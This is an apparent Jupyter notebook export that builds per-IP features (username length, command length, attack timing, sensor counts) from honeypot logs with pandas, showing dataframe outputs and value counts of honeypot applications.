17701,98.172.135.115,2019-05-20 10:21:59.749999872,11.0,41,10,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,4
17702,98.198.202.103,2019-05-20 17:16:57.000000000,NaN,0,0,[3100eaa2-c24c-42c4-8a88-e4619269f447],3100eaa2-c24c-42c4-8a88-e4619269f447,1
17703,98.217.250.11,2019-05-20 07:57:57.000000000,NaN,0,0,[49eed2a1-83a4-4968-90cf-1235dd6f88fa],49eed2a1-83a4-4968-90cf-1235dd6f88fa,1
17704,98.6.58.60,2019-05-20 19:03:18.749999872,12.0,42,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
17705,99.188.30.66,2019-05-20 11:25:11.333333248,48.0,44,24,"[4c2f953b-ffb7-4ac1-b8e6-61e3c36fd59c, 3e6340f...",3e6340f3-dea7-470f-970f-c9291db304b6,3
17706,99.98.99.67,2019-05-20 12:37:49.000000000,NaN,0,0,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259,1

In [31]:
data_final.drop(["mean_time_of_attack", "sd_time_of_attack"], axis = 1)

,src_ip,mean_time_difference,sd_time_difference,all_sensors,most_common_sensor,sensor_number
0,1.1.155.160,41,11,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,4
1,1.1.174.78,41,10,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
2,1.1.176.59,0,0,[41e1395a-95c5-49a9-8b76-0028e2b0d114],41e1395a-95c5-49a9-8b76-0028e2b0d114,1
3,1.1.202.4,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
4,1.1.210.2,42,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,4
5,1.1.218.253,56,44,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,3
6,1.1.238.231,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
7,1.10.137.15,0,0,[da366dbc-3c72-4927-bfc6-73850379ccb0],da366dbc-3c72-4927-bfc6-73850379ccb0,1
8,1.10.193.152,9,31,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,12
9,1.10.199.196,31,54,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,5
10,1.10.255.90,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
11,1.100.134.2,0,0,[cfd4dc54-499e-43d9-848a-1e390a7c984a],cfd4dc54-499e-43d9-848a-1e390a7c984a,1
12,1.100.22.156,0,0,"[6fc6df50-bee2-453b-9f01-42e438bd22f7, 6fc6df5...",6fc6df50-bee2-453b-9f01-42e438bd22f7,2
13,1.109.145.112,0,0,[cfd4dc54-499e-43d9-848a-1e390a7c984a],cfd4dc54-499e-43d9-848a-1e390a7c984a,1
14,1.109.23.38,0,0,[e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb],e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb,1
15,1.119.140.226,0,0,"[1dd6e3fc-ee4f-4761-ab80-34020706c490, 1dd6e3f...",1dd6e3fc-ee4f-4761-ab80-34020706c490,5
16,1.119.150.180,6,13,"[682fa743-a27c-4afe-8ff1-edab04752f01, 23a24e9...",23a24e9d-11bd-4350-b650-af0e688129ad,10
17,1.129.110.113,42,12,"[a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee, a8fed55...",a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee,4
18,1.136.109.185,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
19,1.158.42.147,0,0,[6ba6a97a-2b2c-4279-afd9-3a9f8254ef90],6ba6a97a-2b2c-4279-afd9-3a9f8254ef90,1
20,1.160.202.78,2,3,"[14f9bcb6-2325-43ef-83a8-ac3c8a544681, 14f9bcb...",14f9bcb6-2325-43ef-83a8-ac3c8a544681,12
21,1.160.209.47,58,8,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,8
22,1.160.237.26,43,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,4
23,1.160.75.193,22,30,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,3
24,1.161.174.194,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
25,1.161.184.77,42,11,"[3100eaa2-c24c-42c4-8a88-e4619269f447, 3100eaa...",3100eaa2-c24c-42c4-8a88-e4619269f447,4
26,1.161.213.222,42,11,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,4
27,1.161.240.208,44,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,4
28,1.161.94.44,2,3,"[14f9bcb6-2325-43ef-83a8-ac3c8a544681, 14f9bcb...",14f9bcb6-2325-43ef-83a8-ac3c8a544681,12
29,1.162.171.118,0,0,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506,2
...,...,...,...,...,...,...
17677,96.244.71.124,0,0,[e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb],e15006af-0a5c-4e9e-b8cc-4e6d35c02bcb,1
17678,96.245.190.226,46,4,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,4
17679,96.245.198.6,0,0,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506,2
17680,96.30.101.87,0,0,"[de61ed70-26c8-4482-a1c0-280945212d73, de61ed7...",de61ed70-26c8-4482-a1c0-280945212d73,2
17681,96.30.70.153,41,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
17682,96.30.71.168,31,11,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,5
17683,96.30.94.26,12,17,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,3
17684,96.30.95.194,0,0,"[ea526246-9523-4b18-8d74-1b3049467f91, ea52624...",ea526246-9523-4b18-8d74-1b3049467f91,2
17685,96.57.82.166,35,55,"[c5aa1f90-812b-4bf8-9ac5-219b757ba7b1, c5aa1f9...",cfd4dc54-499e-43d9-848a-1e390a7c984a,4
17686,96.69.120.161,10,0,"[04627cfd-86fc-421d-b770-6b30d455db35, 04627cf...",04627cfd-86fc-421d-b770-6b30d455db35,10
17687,96.70.41.109,0,0,[970757c6-1b54-42d6-8b99-076d30e81ccd],970757c6-1b54-42d6-8b99-076d30e81ccd,1
17688,96.71.40.78,0,0,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259,1
17689,96.75.245.217,0,0,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",49797144-df1a-424a-841f-3b3faaf19506,2
17690,96.76.166.105,3,38,"[c5aa1f90-812b-4bf8-9ac5-219b757ba7b1, cfd4dc5...",cfd4dc54-499e-43d9-848a-1e390a7c984a,5
17691,96.76.250.161,15,53,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,23
17692,96.9.154.23,52,40,"[49797144-df1a-424a-841f-3b3faaf19506, 4979714...",14f9bcb6-2325-43ef-83a8-ac3c8a544681,4
17693,96.92.47.189,10,0,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,10
17694,97.78.232.134,10,0,"[53a71a81-7a04-4640-b70c-20283939c259, 53a71a8...",53a71a81-7a04-4640-b70c-20283939c259,45
17695,98.102.107.42,41,11,"[3100eaa2-c24c-42c4-8a88-e4619269f447, 3100eaa...",3100eaa2-c24c-42c4-8a88-e4619269f447,4
17696,98.113.35.10,16,31,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,8
17697,98.143.63.246,0,0,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259,1
17698,98.143.67.212,0,0,[04627cfd-86fc-421d-b770-6b30d455db35],04627cfd-86fc-421d-b770-6b30d455db35,1
17699,98.151.110.89,0,0,"[d3ba9246-d6a7-4370-9369-47e707ee17fd, d3ba924...",d3ba9246-d6a7-4370-9369-47e707ee17fd,2
17700,98.153.26.245,57,6,"[a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee, a8fed55...",a8fed55b-b5f2-4bbc-b77e-b0feb4d1caee,5
17701,98.172.135.115,41,10,"[49eed2a1-83a4-4968-90cf-1235dd6f88fa, 49eed2a...",49eed2a1-83a4-4968-90cf-1235dd6f88fa,4
17702,98.198.202.103,0,0,[3100eaa2-c24c-42c4-8a88-e4619269f447],3100eaa2-c24c-42c4-8a88-e4619269f447,1
17703,98.217.250.11,0,0,[49eed2a1-83a4-4968-90cf-1235dd6f88fa],49eed2a1-83a4-4968-90cf-1235dd6f88fa,1
17704,98.6.58.60,42,11,"[fdd6134e-08a7-49d3-90d7-5499916077a4, fdd6134...",fdd6134e-08a7-49d3-90d7-5499916077a4,4
17705,99.188.30.66,44,24,"[4c2f953b-ffb7-4ac1-b8e6-61e3c36fd59c, 3e6340f...",3e6340f3-dea7-470f-970f-c9291db304b6,3
17706,99.98.99.67,0,0,[53a71a81-7a04-4640-b70c-20283939c259],53a71a81-7a04-4640-b70c-20283939c259,1

In [32]:
data_final.drop(["mean_time_of_attack", "sd_time_of_attack", "all_sensors", "most_common_sensor"], axis = 1, inplace= True)

In [162]:
data_final

               src_ip  mean_time_difference  sd_time_difference  sensor_number
0         1.1.155.160                    41                  11              4
1          1.1.174.78                    41                  10              4
2          1.1.176.59                     0                   0              1
3           1.1.202.4                    41                  11              4
4           1.1.210.2                    42                  11              4
5         1.1.218.253                    56                  44              3
6         1.1.238.231                    41                  11              4
7         1.10.137.15                     0                   0              1
8        1.10.193.152                     9                  31             12
9        1.10.199.196                    31                  54              5
10        1.10.255.90                    41                  11              4
11        1.100.134.2                     0                   0              1
12       1.100.22.156                     0                   0              2
13      1.109.145.112                     0                   0              1
14        1.109.23.38                     0                   0              1
15      1.119.140.226                     0                   0              5
16      1.119.150.180                     6                  13             10
17      1.129.110.113                    42                  12              4
18      1.136.109.185                    41                  11              4
19       1.158.42.147                     0                   0              1
20       1.160.202.78                     2                   3             12
21       1.160.209.47                    58                   8              8
22       1.160.237.26                    43                  11              4
23       1.160.75.193                    22                  30              3
24      1.161.174.194                    41                  11              4
25       1.161.184.77                    42                  11              4
26      1.161.213.222                    42                  11              4
27      1.161.240.208                    44                  11              4
28        1.161.94.44                     2                   3             12
29      1.162.171.118                     0                   0              2
...               ...                   ...                 ...            ...
17677   96.244.71.124                     0                   0              1
17678  96.245.190.226                    46                   4              4
17679    96.245.198.6                     0                   0              2
17680    96.30.101.87                     0                   0              2
17681    96.30.70.153                    41                  11              4
17682    96.30.71.168                    31                  11              5
17683     96.30.94.26                    12                  17              3
17684    96.30.95.194                     0                   0              2
17685    96.57.82.166                    35                  55              4
17686   96.69.120.161                    10                   0             10
17687    96.70.41.109                     0                   0              1
17688     96.71.40.78                     0                   0              1
17689   96.75.245.217                     0                   0              2
17690   96.76.166.105                     3                  38              5
17691   96.76.250.161                    15                  53             23
17692     96.9.154.23                    52                  40              4
17693    96.92.47.189                    10                   0             10
17694   97.78.232.134                    10                   0             45
17695   98.102.107.42                    41                  11              4
17696    98.113.35.10                    16                  31              8
17697   98.143.63.246                     0                   0              1
17698   98.143.67.212                     0                   0              1
17699   98.151.110.89                     0                   0              2
17700   98.153.26.245                    57                   6              5
17701  98.172.135.115                    41                  10              4
17702  98.198.202.103                     0                   0              1
17703   98.217.250.11                     0                   0              1
17704      98.6.58.60                    42                  11              4
17705    99.188.30.66                    44                  24              3
17706     99.98.99.67                     0                   0              1

[17707 rows x 4 columns]

In [163]:
new = data[["ssh_username", "src_ip"]].dropna()

In [165]:
new["length_username"] = new["ssh_username"].apply(len)

In [65]:
user_length = new.groupby("src_ip").mean()

In [58]:
new.drop(["lenght_username"], axis = 1, inplace = True)

In [166]:
data_final

               src_ip  mean_time_difference  sd_time_difference  sensor_number
0         1.1.155.160                    41                  11              4
1          1.1.174.78                    41                  10              4
2          1.1.176.59                     0                   0              1
3           1.1.202.4                    41                  11              4
4           1.1.210.2                    42                  11              4
5         1.1.218.253                    56                  44              3
6         1.1.238.231                    41                  11              4
7         1.10.137.15                     0                   0              1
8        1.10.193.152                     9                  31             12
9        1.10.199.196                    31                  54              5
10        1.10.255.90                    41                  11              4
11        1.100.134.2                     0                   0              1
12       1.100.22.156                     0                   0              2
13      1.109.145.112                     0                   0              1
14        1.109.23.38                     0                   0              1
15      1.119.140.226                     0                   0              5
16      1.119.150.180                     6                  13             10
17      1.129.110.113                    42                  12              4
18      1.136.109.185                    41                  11              4
19       1.158.42.147                     0                   0              1
20       1.160.202.78                     2                   3             12
21       1.160.209.47                    58                   8              8
22       1.160.237.26                    43                  11              4
23       1.160.75.193                    22                  30              3
24      1.161.174.194                    41                  11              4
25       1.161.184.77                    42                  11              4
26      1.161.213.222                    42                  11              4
27      1.161.240.208                    44                  11              4
28        1.161.94.44                     2                   3             12
29      1.162.171.118                     0                   0              2
...               ...                   ...                 ...            ...
17677   96.244.71.124                     0                   0              1
17678  96.245.190.226                    46                   4              4
17679    96.245.198.6                     0                   0              2
17680    96.30.101.87                     0                   0              2
17681    96.30.70.153                    41                  11              4
17682    96.30.71.168                    31                  11              5
17683     96.30.94.26                    12                  17              3
17684    96.30.95.194                     0                   0              2
17685    96.57.82.166                    35                  55              4
17686   96.69.120.161                    10                   0             10
17687    96.70.41.109                     0                   0              1
17688     96.71.40.78                     0                   0              1
17689   96.75.245.217                     0                   0              2
17690   96.76.166.105                     3                  38              5
17691   96.76.250.161                    15                  53             23
17692     96.9.154.23                    52                  40              4
17693    96.92.47.189                    10                   0             10
17694   97.78.232.134                    10                   0             45
17695   98.102.107.42                    41                  11              4
17696    98.113.35.10                    16                  31              8
17697   98.143.63.246                     0                   0              1
17698   98.143.67.212                     0                   0              1
17699   98.151.110.89                     0                   0              2
17700   98.153.26.245                    57                   6              5
17701  98.172.135.115                    41                  10              4
17702  98.198.202.103                     0                   0              1
17703   98.217.250.11                     0                   0              1
17704      98.6.58.60                    42                  11              4
17705    99.188.30.66                    44                  24              3
17706     99.98.99.67                     0                   0              1

[17707 rows x 4 columns]

In [167]:
current = pd.merge(user_length, data_final, how = "outer", on = "src_ip")

In [168]:
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number
0,1.100.22.156,5.000000,0,0,2
1,1.52.2.217,6.000000,15,37,7
2,1.55.71.60,5.000000,0,0,15
3,100.33.94.246,6.000000,0,0,4
4,100.36.75.127,6.000000,0,0,2
5,101.236.29.126,2.000000,0,0,2
6,101.26.35.254,5.200000,53,53,62
7,101.71.37.21,6.000000,0,0,2
8,102.165.37.59,23.555556,11,49,48
9,103.207.244.92,5.000000,0,0,2
10,103.21.148.16,3.000000,45,11,6
11,103.23.100.217,4.000000,0,0,2
12,103.237.147.69,4.000000,0,0,2
13,103.249.205.78,2.000000,0,0,2
14,103.42.254.96,6.000000,19,14,7
15,103.45.109.95,2.000000,0,0,2
16,103.53.166.148,2.000000,0,0,2
17,103.69.218.147,5.500000,19,33,4
18,103.78.183.41,5.000000,0,0,15
19,103.79.90.72,3.000000,0,0,2
20,103.80.55.34,5.000000,0,0,2
21,103.99.113.89,2.000000,0,0,2
22,104.131.93.33,9.000000,0,0,2
23,104.168.215.199,4.986842,35,43,137
24,104.196.16.112,5.000000,0,0,2
25,104.236.246.127,6.000000,0,0,2
26,104.236.28.167,2.000000,0,0,2
27,104.238.116.19,7.000000,0,0,2
28,104.243.44.230,21.251825,3,34,11502
29,104.248.135.32,6.040650,16,28,585
...,...,...,...,...,...
17677,96.11.92.220,NaN,0,0,2
17678,96.125.192.9,NaN,0,0,1
17679,96.233.79.179,NaN,0,0,2
17680,96.244.71.124,NaN,0,0,1
17681,96.245.190.226,NaN,46,4,4
17682,96.245.198.6,NaN,0,0,2
17683,96.30.101.87,NaN,0,0,2
17684,96.30.70.153,NaN,41,11,4
17685,96.30.71.168,NaN,31,11,5
17686,96.30.94.26,NaN,12,17,3
17687,96.30.95.194,NaN,0,0,2
17688,96.69.120.161,NaN,10,0,10
17689,96.70.41.109,NaN,0,0,1
17690,96.71.40.78,NaN,0,0,1
17691,96.75.245.217,NaN,0,0,2
17692,96.76.250.161,NaN,15,53,23
17693,96.9.154.23,NaN,52,40,4
17694,96.92.47.189,NaN,10,0,10
17695,97.78.232.134,NaN,10,0,45
17696,98.102.107.42,NaN,41,11,4
17697,98.113.35.10,NaN,16,31,8
17698,98.143.63.246,NaN,0,0,1
17699,98.143.67.212,NaN,0,0,1
17700,98.153.26.245,NaN,57,6,5
17701,98.172.135.115,NaN,41,10,4
17702,98.198.202.103,NaN,0,0,1
17703,98.217.250.11,NaN,0,0,1
17704,98.6.58.60,NaN,42,11,4
17705,99.188.30.66,NaN,44,24,3
17706,99.98.99.67,NaN,0,0,1

In [169]:
current['length_username'].fillna(value = current['length_username'].mean(), inplace = True)

In [170]:
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number
0,1.100.22.156,5.000000,0,0,2
1,1.52.2.217,6.000000,15,37,7
2,1.55.71.60,5.000000,0,0,15
3,100.33.94.246,6.000000,0,0,4
4,100.36.75.127,6.000000,0,0,2
5,101.236.29.126,2.000000,0,0,2
6,101.26.35.254,5.200000,53,53,62
7,101.71.37.21,6.000000,0,0,2
8,102.165.37.59,23.555556,11,49,48
9,103.207.244.92,5.000000,0,0,2
10,103.21.148.16,3.000000,45,11,6
11,103.23.100.217,4.000000,0,0,2
12,103.237.147.69,4.000000,0,0,2
13,103.249.205.78,2.000000,0,0,2
14,103.42.254.96,6.000000,19,14,7
15,103.45.109.95,2.000000,0,0,2
16,103.53.166.148,2.000000,0,0,2
17,103.69.218.147,5.500000,19,33,4
18,103.78.183.41,5.000000,0,0,15
19,103.79.90.72,3.000000,0,0,2
20,103.80.55.34,5.000000,0,0,2
21,103.99.113.89,2.000000,0,0,2
22,104.131.93.33,9.000000,0,0,2
23,104.168.215.199,4.986842,35,43,137
24,104.196.16.112,5.000000,0,0,2
25,104.236.246.127,6.000000,0,0,2
26,104.236.28.167,2.000000,0,0,2
27,104.238.116.19,7.000000,0,0,2
28,104.243.44.230,21.251825,3,34,11502
29,104.248.135.32,6.040650,16,28,585
...,...,...,...,...,...
17677,96.11.92.220,6.465478,0,0,2
17678,96.125.192.9,6.465478,0,0,1
17679,96.233.79.179,6.465478,0,0,2
17680,96.244.71.124,6.465478,0,0,1
17681,96.245.190.226,6.465478,46,4,4
17682,96.245.198.6,6.465478,0,0,2
17683,96.30.101.87,6.465478,0,0,2
17684,96.30.70.153,6.465478,41,11,4
17685,96.30.71.168,6.465478,31,11,5
17686,96.30.94.26,6.465478,12,17,3
17687,96.30.95.194,6.465478,0,0,2
17688,96.69.120.161,6.465478,10,0,10
17689,96.70.41.109,6.465478,0,0,1
17690,96.71.40.78,6.465478,0,0,1
17691,96.75.245.217,6.465478,0,0,2
17692,96.76.250.161,6.465478,15,53,23
17693,96.9.154.23,6.465478,52,40,4
17694,96.92.47.189,6.465478,10,0,10
17695,97.78.232.134,6.465478,10,0,45
17696,98.102.107.42,6.465478,41,11,4
17697,98.113.35.10,6.465478,16,31,8
17698,98.143.63.246,6.465478,0,0,1
17699,98.143.67.212,6.465478,0,0,1
17700,98.153.26.245,6.465478,57,6,5
17701,98.172.135.115,6.465478,41,10,4
17702,98.198.202.103,6.465478,0,0,1
17703,98.217.250.11,6.465478,0,0,1
17704,98.6.58.60,6.465478,42,11,4
17705,99.188.30.66,6.465478,44,24,3
17706,99.98.99.67,6.465478,0,0,1

In [171]:
new_command = data[['src_ip', 'command']]
new_command.dropna(inplace = True)
new_command['length_command'] = new_command['command'].apply(len)

/anaconda3/lib/python3.6/site-packages/ipykernel_launcher.py:2: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame

See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy

/anaconda3/lib/python3.6/site-packages/ipykernel_launcher.py:3: SettingWithCopyWarning:
A value is trying to be set on a copy of a slice from a DataFrame.
Try using .loc[row_indexer,col_indexer] = value instead

See the caveats in the documentation: http://pandas.pydata.org/pandas-docs/stable/indexing.html#indexing-view-versus-copy
  This is separate from the ipykernel package so we can avoid doing imports until

In [172]:
feature = new_command.groupby('src_ip').mean()

In [173]:
current = pd.merge(current, feature, how = 'outer', on = "src_ip")

In [174]:
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command
0,1.100.22.156,5.000000,0,0,2,NaN
1,1.52.2.217,6.000000,15,37,7,NaN
2,1.55.71.60,5.000000,0,0,15,20.461538
3,100.33.94.246,6.000000,0,0,4,NaN
4,100.36.75.127,6.000000,0,0,2,NaN
5,101.236.29.126,2.000000,0,0,2,NaN
6,101.26.35.254,5.200000,53,53,62,NaN
7,101.71.37.21,6.000000,0,0,2,NaN
8,102.165.37.59,23.555556,11,49,48,NaN
9,103.207.244.92,5.000000,0,0,2,NaN
10,103.21.148.16,3.000000,45,11,6,NaN
11,103.23.100.217,4.000000,0,0,2,NaN
12,103.237.147.69,4.000000,0,0,2,NaN
13,103.249.205.78,2.000000,0,0,2,NaN
14,103.42.254.96,6.000000,19,14,7,NaN
15,103.45.109.95,2.000000,0,0,2,NaN
16,103.53.166.148,2.000000,0,0,2,NaN
17,103.69.218.147,5.500000,19,33,4,NaN
18,103.78.183.41,5.000000,0,0,15,20.461538
19,103.79.90.72,3.000000,0,0,2,NaN
20,103.80.55.34,5.000000,0,0,2,NaN
21,103.99.113.89,2.000000,0,0,2,NaN
22,104.131.93.33,9.000000,0,0,2,NaN
23,104.168.215.199,4.986842,35,43,137,4.857143
24,104.196.16.112,5.000000,0,0,2,NaN
25,104.236.246.127,6.000000,0,0,2,NaN
26,104.236.28.167,2.000000,0,0,2,NaN
27,104.238.116.19,7.000000,0,0,2,NaN
28,104.243.44.230,21.251825,3,34,11502,28.663072
29,104.248.135.32,6.040650,16,28,585,8.000000
...,...,...,...,...,...,...
17677,96.11.92.220,6.465478,0,0,2,NaN
17678,96.125.192.9,6.465478,0,0,1,NaN
17679,96.233.79.179,6.465478,0,0,2,NaN
17680,96.244.71.124,6.465478,0,0,1,NaN
17681,96.245.190.226,6.465478,46,4,4,NaN
17682,96.245.198.6,6.465478,0,0,2,NaN
17683,96.30.101.87,6.465478,0,0,2,NaN
17684,96.30.70.153,6.465478,41,11,4,NaN
17685,96.30.71.168,6.465478,31,11,5,NaN
17686,96.30.94.26,6.465478,12,17,3,NaN
17687,96.30.95.194,6.465478,0,0,2,NaN
17688,96.69.120.161,6.465478,10,0,10,NaN
17689,96.70.41.109,6.465478,0,0,1,NaN
17690,96.71.40.78,6.465478,0,0,1,NaN
17691,96.75.245.217,6.465478,0,0,2,NaN
17692,96.76.250.161,6.465478,15,53,23,NaN
17693,96.9.154.23,6.465478,52,40,4,NaN
17694,96.92.47.189,6.465478,10,0,10,NaN
17695,97.78.232.134,6.465478,10,0,45,NaN
17696,98.102.107.42,6.465478,41,11,4,NaN
17697,98.113.35.10,6.465478,16,31,8,NaN
17698,98.143.63.246,6.465478,0,0,1,NaN
17699,98.143.67.212,6.465478,0,0,1,NaN
17700,98.153.26.245,6.465478,57,6,5,NaN
17701,98.172.135.115,6.465478,41,10,4,NaN
17702,98.198.202.103,6.465478,0,0,1,NaN
17703,98.217.250.11,6.465478,0,0,1,NaN
17704,98.6.58.60,6.465478,42,11,4,NaN
17705,99.188.30.66,6.465478,44,24,3,NaN
17706,99.98.99.67,6.465478,0,0,1,NaN

In [175]:
current['length_command'].fillna(value = current['length_command'].mean(), inplace = True)

In [176]:
current

,src_ip,length_username,mean_time_difference,sd_time_difference,sensor_number,length_command
0,1.100.22.156,5.000000,0,0,2,88.940892
1,1.52.2.217,6.000000,15,37,7,88.940892
2,1.55.71.60,5.000000,0,0,15,20.461538
3,100.33.94.246,6.000000,0,0,4,88.940892
4,100.36.75.127,6.000000,0,0,2,88.940892
5,101.236.29.126,2.000000,0,0,2,88.940892
6,101.26.35.254,5.200000,53,53,62,88.940892
7,101.71.37.21,6.000000,0,0,2,88.940892
8,102.165.37.59,23.555556,11,49,48,88.940892
9,103.207.244.92,5.000000,0,0,2,88.940892
10,103.21.148.16,3.000000,45,11,6,88.940892
11,103.23.100.217,4.000000,0,0,2,88.940892
12,103.237.147.69,4.000000,0,0,2,88.940892
13,103.249.205.78,2.000000,0,0,2,88.940892
14,103.42.254.96,6.000000,19,14,7,88.940892
15,103.45.109.95,2.000000,0,0,2,88.940892
16,103.53.166.148,2.000000,0,0,2,88.940892
17,103.69.218.147,5.500000,19,33,4,88.940892
18,103.78.183.41,5.000000,0,0,15,20.461538
19,103.79.90.72,3.000000,0,0,2,88.940892
20,103.80.55.34,5.000000,0,0,2,88.940892
21,103.99.113.89,2.000000,0,0,2,88.940892
22,104.131.93.33,9.000000,0,0,2,88.940892
23,104.168.215.199,4.986842,35,43,137,4.857143
24,104.196.16.112,5.000000,0,0,2,88.940892
25,104.236.246.127,6.000000,0,0,2,88.940892
26,104.236.28.167,2.000000,0,0,2,88.940892
27,104.238.116.19,7.000000,0,0,2,88.940892
28,104.243.44.230,21.251825,3,34,11502,28.663072
29,104.248.135.32,6.040650,16,28,585,8.000000
...,...,...,...,...,...,...
17677,96.11.92.220,6.465478,0,0,2,88.940892
17678,96.125.192.9,6.465478,0,0,1,88.940892
17679,96.233.79.179,6.465478,0,0,2,88.940892
17680,96.244.71.124,6.465478,0,0,1,88.940892
17681,96.245.190.226,6.465478,46,4,4,88.940892
17682,96.245.198.6,6.465478,0,0,2,88.940892
17683,96.30.101.87,6.465478,0,0,2,88.940892
17684,96.30.70.153,6.465478,41,11,4,88.940892
17685,96.30.71.168,6.465478,31,11,5,88.940892
17686,96.30.94.26,6.465478,12,17,3,88.940892
17687,96.30.95.194,6.465478,0,0,2,88.940892
17688,96.69.120.161,6.465478,10,0,10,88.940892
17689,96.70.41.109,6.465478,0,0,1,88.940892
17690,96.71.40.78,6.465478,0,0,1,88.940892
17691,96.75.245.217,6.465478,0,0,2,88.940892
17692,96.76.250.161,6.465478,15,53,23,88.940892
17693,96.9.154.23,6.465478,52,40,4,88.940892
17694,96.92.47.189,6.465478,10,0,10,88.940892
17695,97.78.232.134,6.465478,10,0,45,88.940892
17696,98.102.107.42,6.465478,41,11,4,88.940892
17697,98.113.35.10,6.465478,16,31,8,88.940892
17698,98.143.63.246,6.465478,0,0,1,88.940892
17699,98.143.67.212,6.465478,0,0,1,88.940892
17700,98.153.26.245,6.465478,57,6,5,88.940892
17701,98.172.135.115,6.465478,41,10,4,88.940892
17702,98.198.202.103,6.465478,0,0,1,88.940892
17703,98.217.250.11,6.465478,0,0,1,88.940892
17704,98.6.58.60,6.465478,42,11,4,88.940892
17705,99.188.30.66,6.465478,44,24,3,88.940892
17706,99.98.99.67,6.465478,0,0,1,88.940892

In [177]:
data['app'].value_counts()

cowrie        1238845
dionaea        195462
amun             5801
rdphoney         2646
glastopf          738
conpot             27
user                3
arnaud              2
cssserver           2
vnc                 2
jira                2
hexer               2
www                 2
samba               2
wwwrun              2
spark04             1
xm_ietsp            1
dani                1
jhon                1
prueba              1
frappe              1
info                1
black               1
temp                1
http                1
nagios              1
spark03             1
matthieu            1
servercsgo          1
test                1
               ...
henning             1
css                 1
db2inst1            1
user1               1
matrix              1
michelle            1
prova               1
topqrs              1
sophie              1
sql                 1
upload              1
redis               1
spark01             1
mysql               1
torrent             1
wolwerine           1
ftpuser             1
ftpadmin            1
zabbix              1
dasusr1             1
mail                1
isaac               1
jenkins             1
renee               1
cvs                 1
system              1
alex                1
teamspeak           1
panel               1
michael             1
Name: app, Length: 74, dtype: int64

In [135]:
counts = data['app'].value_counts()
res = data[~data['app'].isin(counts[counts < 27].index)]
res['app'].value_counts()
honeypot = res[['app', 'src_ip']]
honeypot

             app          src_ip
0         cowrie  198.199.89.115
1         cowrie  198.199.89.115
2         cowrie  198.199.89.115
3         cowrie  198.199.89.115
4         cowrie  198.199.89.115
5         cowrie  198.199.89.115
6         cowrie  198.199.89.115
7         cowrie  198.199.89.115
8         cowrie  198.199.89.115
9         cowrie  198.199.89.115
10        cowrie  198.199.89.115
11        cowrie  198.199.89.115
12        cowrie  198.199.89.115
13        cowrie  198.199.89.115
14        cowrie  198.199.89.115
15        cowrie  198.199.89.115
16        cowrie  198.199.89.115
17        cowrie  198.199.89.115
18        cowrie  198.199.89.115
